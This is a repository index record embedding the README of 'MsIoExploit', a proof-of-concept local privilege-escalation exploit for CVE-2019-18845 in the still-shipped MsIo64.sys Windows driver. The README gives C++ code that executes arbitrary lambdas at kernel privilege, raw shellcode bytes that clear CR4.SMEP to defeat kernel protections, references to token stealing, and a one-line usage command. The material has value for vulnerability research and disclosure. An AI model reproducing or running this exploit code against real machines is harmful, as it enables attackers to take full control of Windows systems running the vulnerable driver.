{"id":16551780,"url":"https://github.com/kkent030315/msioexploit","last_synced_at":"2025-03-21T10:32:09.404Z","repository":{"id":51694326,"uuid":"380591177","full_name":"kkent030315/MsIoExploit","owner":"kkent030315","description":"Exploit MsIo vulnerable driver","archived":false,"fork":false,"pushed_at":"2021-08-12T00:06:19.000Z","size":635,"stargazers_count":93,"open_issues_count":2,"forks_count":36,"subscribers_count":9,"default_branch":"main","last_synced_at":"2025-03-18T00:37:37.628Z","etag":null,"topics":["cve-2019-18845","kernel","kernel-exploit","kernel-exploits","windows"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kkent030315.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-06-26T20:31:03.000Z","updated_at":"2025-03-13T12:56:32.000Z","dependencies_parsed_at":"2022-08-03T09:15:12.137Z","dependency_job_id":null,"html_url":"https://github.com/kkent030315/MsIoExploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kkent030315%2FMsIoExploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kkent030315","download_url":"https://codeload.github.com/kkent030315/MsIoExploit/tar.gz/refs/heads/main
","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244777991,"owners_count":20508826,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2019-18845","kernel","kernel-exploit","kernel-exploits","windows"],"created_at":"2024-10-11T19:43:08.615Z","updated_at":"2025-03-21T10:32:09.055Z","avatar_url":"https://github.com/kkent030315.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg src=\"image.gif\"\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://img.shields.io/github/workflow/status/kkent030315/MsIoExploit/MSBuild?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/badge/platform-win--64-00a2ed?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/codacy/grade/80af226b06214213bc3d2a44c9624222?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/license/kkent030315/MsIoExploit?style=for-the-badge\"\u003e\n\u003c/p\u003e\n\n# MsIoExploit\n\nExploit MsIo vulnerable driver\n\n# Description\n\nThis is a PoC for [CVE-2019-18845](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18845): `MsIo64.sys` allows a non-privileged user to map and unmap arbitrary physical memory via `ZwMapViewOfSection` / `ZwUnmapViewOfSection`.\nIf you are interested in abusing physical memory mapping, see [project anycall](https://github.com/kkent030315/anycall/tree/main/anycall), which has a full implementation of the client- and driver-side functionality.\n\nAllowing a non-privileged (non-kernel) component to map arbitrary physical memory is about the worst possible practice and is critically vulnerable: it lets an attacker gain full control of the system, as I demonstrated with arbitrary NT kernel API invocation in this PoC.\n\nYou can try it yourself by running this PoC while the driver is loaded.\n\nAlso, this driver and `MsIo64.dll` are a full copy \u0026 paste of [IO-Memory](https://github.com/Bleichroder/IO-Memory).\n\nThis vulnerability was first reported in 2019 but still remains unfixed, and hardware vendors such as ASRock still ship this driver.\n\n### Features\n\n- Privilege Escalation\n- Shellcode Execution\n- Arbitrary code execution in CPL0 context\n  - `__writemsr`, `__cpuid` or whatever\n\nI've implemented a replica of the Capcom exploit so you can execute any code in the CPL0 context, as follows:\n\n```cpp\nunsigned long long cr4 = 0;\n// the lambda below cannot capture, so everything it touches must be static\nstatic auto ntoskrnl_image_base = this-\u003entoskrnl_image_base;\nstatic uint16_t dos_signature = 0x0;\n\nthis-\u003edisable_smep(\u0026cr4); // save CR4, then clear CR4.SMEP so user pages may execute at CPL0\n// lambda will be called in CPL0\nthis-\u003eexec_in_kernel([]() -\u003e void\n    {\n        // direct access to kernel virtual memory\n        dos_signature = *(uint16_t*)(ntoskrnl_image_base);\n    });\nthis-\u003eenable_smep(\u0026cr4); // restore the saved CR4\n```\n\nPlease note that the lambda cannot capture anything, because a capturing lambda is not convertible to a plain function pointer, so only `static` variables are accessible from inside it. Also, in the CPL0 context some functions simply cannot be called; calling `printf`, for example, will of course cause a BSOD.\n\nShellcode execution looks like this:\n\n```cpp\nvoid exploit::disable_smep(unsigned long long* old_cr4)\n{\n    static uint8_t disable_smep_shellcode[] = {\n        0xFA,                               // cli\n        0x0F, 0x20, 0xE0,                   // mov rax, cr4\n        0x48, 0x89, 0x01,                   // mov QWORD PTR [rcx], rax  ; rcx holds the first argument\n        0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff ; clears bit 20 (CR4.SMEP) only\n        0x0F, 0x22, 0xE0,                   // mov cr4, rax\n        0xC3 };                             // ret\n\n    this-\u003eexecute_shellcode_in_kernel\u003cfn_disable_smep_t\u003e(\n        reinterpret_cast\u003cuint8_t*\u003e(\u0026disable_smep_shellcode),\n        sizeof(disable_smep_shellcode),\n        old_cr4);\n}\n```\n\nNow we have full control over the system; there is no need to do something as crude as mapping an unsigned driver.\n\n# Usage\n\n```bash\n\u003e MsIoExploit.exe\n```\n\n# Credit\n\nSeveral sources regarding token stealing are from [ExploitCapcom](https://github.com/tandasat/ExploitCapcom)\n\nCredit [@tandasat](https://github.com/tandasat/)\n\n# License\n\nMIT copyright Kento Oki \\\u003chrn832@protonmail.com\\\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fmsioexploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkkent030315%2Fmsioexploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkkent030315%2Fmsioexploit/lists"}